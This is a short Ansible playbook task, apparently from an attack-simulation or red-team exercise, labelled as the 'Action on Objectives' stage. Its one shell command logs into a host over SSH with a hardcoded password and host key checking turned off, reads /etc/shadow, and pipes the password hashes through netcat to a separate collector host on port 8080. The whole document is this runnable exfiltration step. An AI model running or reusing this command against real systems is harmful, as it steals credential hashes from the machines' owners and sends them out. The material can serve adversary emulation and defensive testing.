---
- name: Action on Objectives - Exfiltrate /etc/shadow to collector
  shell: "sshpass -p 'password' ssh -o StrictHostKeyChecking=no user@192.168.254.132 'cat /etc/shadow' | nc 192.168.254.131 8080"
